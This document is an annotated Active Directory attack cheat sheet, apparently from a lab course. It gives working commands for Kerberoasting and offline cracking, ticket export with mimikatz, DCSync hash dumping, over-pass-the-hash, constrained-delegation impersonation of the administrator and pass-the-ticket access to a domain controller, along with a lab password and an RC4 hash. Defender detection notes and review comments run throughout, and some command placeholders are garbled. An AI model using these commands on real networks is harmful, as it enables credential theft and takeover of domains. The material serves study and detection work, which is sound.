# Kerberoasting with impacket: request service tickets for SPN accounts, then crack them offline.
# Defender note: each -request / -request-user call is a 4769 (service ticket requested) on the DC;
# RC4 (etype 0x17) tickets for SPN-bearing accounts are the usual Kerberoasting indicator.
# NOTE(review): the script is spelled two ways on this page (GetUsersSPNs.py / GetUserSPNs.py); impacket ships GetUserSPNs.py.
# NOTE(review): the placeholders presumably read <domain>/<user> — the closing '>' looks lost in extraction.
# Request 1 Ticket
GetUsersSPNs.py -dc-ip <ip> <domain/<user> -request-user <username>
# Request All Tickets
GetUsersSPNs.py -dc-ip <ip> <domain/<user --request
# Save to Output
GetUserSPNs.py -dc-ip <ip> INLANEFREIGHT.LOCAL/forend -request-user sqldev -outputfile sqldev_tgs
# Crack TGS Ticket
# -m 13100 is hashcat's Kerberos 5 TGS-REP etype 23 (RC4) mode. $ROCKYOU must hold the wordlist path and is
# unquoted here, so a path containing spaces would be word-split — "$ROCKYOU" is the safe form.
hashcat -m 13100 file.tgs $ROCKYOU
# Enable Base64 Output
# mimikatz console from here to the export: base64 /out:true makes the listed tickets print as base64 text.
base64 /out:true
# Export Tickets
kerberos::list /export
# Modify To Better Format
# Removes the line breaks from the pasted blob; the unquoted \\n reaches tr as \n, which tr reads as newline.
echo "<base64 blob>" | tr -d \\n
# Output To John Format
# Decodes the single-line base64 back to a binary .kirbi (useless use of cat: base64 -d < encoded_file does the same).
cat encoded_file | base64 -d > sqldev.kirbi
# Make to John Format
python2.7 kirbi2john.py sqldev.kirbi
# HashCat Way, Modify to hashcat format
# Rewrites the John layout $krb5tgs$<a>:<b> into the hashcat 13100 layout $krb5tgs$23$*<a>*$<b>.
# sed has no file argument, so it reads stdin — pipe the kirbi2john output into it.
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/'
PowerView
# Import Module
Import-Module .\PowerView.ps1
# List Users With SPN
# -spn keeps only accounts that have a servicePrincipalName, i.e. the accounts whose TGS can be roasted.
Get-DomainUser * -spn | select samaccountname
# Target Single User + Hashcat Output
# Requests a service ticket for that account's SPN and emits it in hashcat (mode 13100) form.
# Defender note: this is a 4769 on the DC; an RC4 (0x17) ticket stands out in an AES-only domain.
Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat
Rubeus
# /Stats
# Prints a summary of roastable accounts (encryption types, password ages) instead of requesting tickets.
.\Rubeus.exe kerberoast /stats
# List Admin Privileges Users for Kerberoasting
# admincount=1 marks accounts protected by AdminSDHolder, i.e. current or former privileged accounts;
# /nowrap keeps each hash on a single line so it pastes cleanly into cracking tools.
# Defender note: SPN accounts with admincount=1 are the highest-value roasting targets — keep them out of
# privileged groups or give them long random passwords / gMSA.
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
Double Hop Workarounds
Method 1: PSCredential Object
# Set password
# NOTE(review): the password is a cleartext literal; it will be kept in PowerShell history, transcripts and any
# command logging on the host.
$SecPassword = ConvertTo-SecureString '0xF0rk123!' -AsPlainText -Force
# Set Proper Login
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\backupadm', $SecPassword)
# Use Command with Credentials
# Passing -Credential explicitly gives the cmdlet its own credentials for the second hop, which is what the
# double-hop problem otherwise withholds.
get-domainuser -spn -credential $Cred | select samaccountname
# Once Intercepted, we need to renew the ticket
# ("Intercepted" in the original comment is unclear — presumably once the ticket has been obtained or is near expiry.)
# /ptt injects the renewed ticket into the current logon session.
.\Rubeus.exe renew /ticket:<base64> /ptt
4 DcSync
# Since we have a Ticket from dc01 and can dump all the hashes
# DCSync asks the DC to replicate account secrets over the directory replication protocol; it requires the
# replication extended rights on the domain object.
# NOTE(review): as written the command names no account — mimikatz expects e.g. /user:<account> with it.
# Defender note: a 4662 carrying DS-Replication-Get-Changes / -Get-Changes-All from a source that is not a DC is
# the standard detection.
lsadump::dcsync
5 Using NT Hash
# With DCSync, we are able to get all the hashes, we use the administrator hash to ask for a TGT
# Over-pass-the-hash: the RC4 key alone is enough to build the AS-REQ; /ptt places the TGT in this logon session.
# Defender note: the resulting 4768 shows an RC4 (0x17) TGT for an account that normally authenticates with AES.
.\Rubeus.exe asktgt /rc4:<NT-Hash> /user:<user> /ptt
# Perform Actions on DC01
# The injected ticket is used transparently by SMB here.
dir \\dc01.inlanefreight.local\c$
# Finds domain users that hold write-type rights directly on computer objects (an ACL audit; useful to both sides).
# import the PowerView module
Import-Module C:\Tools\PowerView.ps1
# get all computers in the domain
$computers = Get-DomainComputer
# get all users in the domain
$users = Get-DomainUser
# define the required access rights
# Any of these on a computer object lets the holder modify it — the rights an ACL review should surface.
$accessRights = "GenericWrite","GenericAll","WriteProperty","WriteDacl"
# loop through each computer in the domain
# NOTE(review): one Get-ObjectAcl per computer and a users × computers inner loop — fine for a lab, slow on a large domain.
foreach ($computer in $computers) {
# get the security descriptor for the computer
# -ResolveGUIDs presumably resolves object-type GUIDs in the ACEs to names; the match below only reads
# ActiveDirectoryRights, so it is informational here — confirm against PowerView.
$acl = Get-ObjectAcl -SamAccountName $computer.SamAccountName -ResolveGUIDs
# loop through each user in the domain
foreach ($user in $users) {
# check if the user has the required access rights on the computer object
# Keeps the ACEs whose trustee SID is this user, then tests each ACE's rights against the regex
# "GenericWrite|GenericAll|WriteProperty|WriteDacl". Only direct grants are seen — rights inherited through
# group membership are missed because the SID comparison is against the user's own ObjectSID.
# NOTE(review): $hasAccess is an array of booleans. PowerShell treats an array of two or more elements as $true
# even when every element is $false, so a user with several non-matching ACEs is still reported;
# testing ($hasAccess -contains $true) would be exact.
$hasAccess = $acl | ?{$_.SecurityIdentifier -eq $user.ObjectSID} | %{($_.ActiveDirectoryRights -match ($accessRights -join '|'))}
if ($hasAccess) {
Write-Output "$($user.SamAccountName) has the required access rights on $($computer.Name)"
}
}
}
# /altservice:host,RPCSS,wsman,http,ldap,krbtgt,winrm
# (the original note lists alternative service classes; the command below does not use /altservice)
# Constrained-delegation abuse (S4U2Self + S4U2Proxy): the HACKTHEBOX$ account, whose RC4 key is given inline,
# obtains a ticket as administrator for the SPN in /msdsspn. The hash and hostnames are this page's lab values.
# Defender note: audit msDS-AllowedToDelegateTo on computer accounts, avoid protocol transition where possible,
# and put privileged accounts in Protected Users / mark them "sensitive and cannot be delegated" so they
# cannot be impersonated this way.
.\Rubeus.exe s4u /user:HACKTHEBOX$ /rc4:CF767C9A9C529361F108AA67BF1B3695 /impersonateuser:administrator /msdsspn:cifs/dc01.inlanefreight.local /ptt
# Connect to DC
ls \\dc01.inlanefreight.local\c$
Pass-the-Ticket reuses a user's Ticket Granting Ticket (TGT) or Ticket Granting Service (TGS) ticket. The TGT is a signed ticket that contains a list of privilege levels. The TGT is presented to the Domain Controller, which grants the TGS ticket that can then be used to access machines. Stealing either of these tickets makes lateral movement possible.